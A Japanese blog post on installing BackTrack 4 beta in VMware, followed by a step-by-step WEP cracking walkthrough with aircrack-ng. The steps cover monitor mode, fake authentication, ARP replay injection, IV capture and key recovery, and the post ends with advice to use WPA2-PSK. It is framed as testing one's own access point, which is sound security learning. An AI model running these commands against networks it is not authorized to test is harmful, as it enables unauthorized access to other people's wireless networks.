2009-03-06

BackTrack 4のBetaがリリース(そして、WEPのクラック)

BackTrack 4Betaが2/11にリリースされていた。
・BackTrackとは
WHAXとAuditor Security Collectionが合体してできたセキュリティ用(≠侵入テスト用)Linuxディストリビューション。

早速、thinkpadX200にBackTrack Beta4をインストールしてみようと思ったのだが、どっこいDVDドライブが貸し出し中だったので、とりあえず、VMwareImageで動かしてみた。
Description: VMware Image
Name: bt4-beta-vm-6.5.1.rar
Size: 1 GB
MD5: 38acdcbaf6c73d7c55180dfea8641e5d
Download: Click here

・必要なもの
VMwarePlayer
BackTrack4 beta image

・手順
1. VMwarePlayerをインストールする。
2.BackTrack4 betaのイメージファイルをダウンロードして、ファイルを解凍する。自動でフォルダが作成されるので、フォルダ中のBT4-Beta.vmxをダブルクリックする。
3.BackTrack4が起動して、ログイン画面が表示されたら、ユーザ名:root、パスワード:toorを入力する。
4. starxと入力する。
5. GUIが正常に立ち上がったら起動成功!!

※BackTrac4で日本語を入力するときは、アプリケーションの起動前にjapaneseをつける
ex) BT~ #japanese firefox &



・WEPのCrack(Aircrack-ngの使い方)
お約束ですが、、、他人の無線LANのパスワードをクラックする行為は、法律(電波法第109条の2)に抵触するので絶対に実施しないこと。自APの実験用の記事です。
無線パケットのフレーム構成やWEPの仕組み、キャプチャ方法については、802.11無線ネットワーク管理 第2版に詳しく出ているので事前に見ておくとよい。後は前に書いた記事にも少しは参考になるかな。

■条件
APのMACアドレス(xx:xx:xx:xx:xx:xx)
USB無線アダプタのMACアドレス(yy:yy:yy:yy:yy:yy)
APのESSID(HOGE)
thinkpadX200(WindowsXP:VMware)

■WEPのクラック手順
1.BackTrack4betaが正常に起動している状態で、PLANEX Wi-Fi USBアダプタ(ホワイト) GW-US54Mini2WをUSBポートに挿入する。APにはBUFFALO AirStation NFINITI Draft11n対応 11g&b 無線LANブロードバンドルータ WZR2-G300Nを利用。

2. VMwareのメニューに[802.11 bg lan]として表示されていることを確認する。

3. 無線アダプタをモニターモードに切り替え
BT~#iwconfig wlan0 mode monitor
※無線LANアダプタ(wlan0)がmonitorモードになり、無線LAN上の全てのパケットをキャプチャできるようになる。

4. 解析対象とするAPの決定
解析対象となるAPを決定するため、周囲の検索を行う。
BT~#airodump-ng --band abg wlan0
BT~#airodump-ng --channel 1 wlan0

5. 無線チャネルの設定
BT~#airmon-ng start wlan0 1
※ここでは1chを設定している

6. 解析対象のAPとアソシエーションを実施
BT~# aireplay-ng --fakeauth 0 -e HOGE -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy wlan0
※アソシエーションに成功すると、以下のメッセージが表示される。ここでDeAssociationと表示される場合は、APにMacアドレスフィルタリングが設定されているので、USBアダプタのMACアドレスを、適切なアドレスに変更する必要がある。
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)

※無線通信の前にAPとアダプタをアソシエーションする。WEPキー情報は必要ない。アソシエーションは時間がたつと自動で解除されるので、定期的にアソシエーションする必要がある。アソシエーションの間隔は-1オプションの引数で指定。

7. 初期化ベクタの収集(ARPインジェクションの実施)
大量のARPリクエストを送出し、初期化ベクタ(IV)を短時間で入手する。
BT~# aireplay-ng --arpreplay -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy wlan0
※手順6に失敗していると、ARPリクエストに対してAPが応答しない。

APからARP応答があるのを確認したら、下記コマンドを別コンソールで入力し、パケットを収集する。
BT~# airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w dump wlan0
※ch1を収集する場合
※解析に必要なパケット数:64bitWEP(約4万パケット)、128bitWEP(約8万パケット)。
パケットの収集が終わったらctrl+cを入力しインジェクション&収集を中止する。

8.パケットの解析
BT~# aircrack-ng -z -b xx:xx:xx:xx:xx:xx dump-01.cap
※解析が完了するとキー情報が表示される。


・無線LANのセキュリティ強化
暗号化方式にWPA2-PSK(AES)を設定すること、これに限る。WPA-PSK(TKIP)も安心といえない。↓は気休め程度の意味しかない。
 WEP⇒3分もあれば解析できる
 ESSIDのステルス化⇒キャプチャすればバレバレ
 MACアドレスフィルタリング⇒ESSIDに同じ

最近の無線ルータであれば、無線LANの自動設定機能(WPS"wifi"、AOSS"buffalo"、らくらく無線スタート"NECアクセステクニカ"など)が実装されている。誰でも簡単に、高いセキュリティレベルの設定が可能なので、ぜひ利用するようにしたい。


・リンク
BackTrack4beta
BackTrackを使ってセキュリティをテストする

1 comment:

Anonymous said...

手順6で毎回謎のエラーがでる

面会行った時は成功したのに

それ以来、一度も成功してない・・・

無線LANは記事と同じもの。